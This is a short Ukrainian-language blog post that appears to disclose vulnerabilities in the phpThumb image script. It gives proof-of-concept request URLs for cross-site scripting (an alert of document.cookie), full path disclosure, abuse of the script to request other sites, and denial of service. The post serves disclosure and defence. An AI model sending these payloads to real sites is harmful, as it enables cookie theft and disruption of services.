Websecurity - Веб безпека

Ще у березні, 05.03.2011, я виявив численні уразливості в phpThumb. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Цей веб додаток зроблений на основі TimThumb і має подібні XSS, FPD, AoF і DoS уразливості.

XSS (WASC-08):

http://site/phpThumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/phpThumb.php
http://site/phpThumb.php?src=http://

Abuse of Functionality (WASC-42):

http://site/phpThumb.php?src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/phpThumb.php?src=src=http://site/big_file&h=1&w=1

Уразливі всі версії phpThumb та веб додатки, що його використовують.

This entry was posted on 23:50 16.04.2015 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.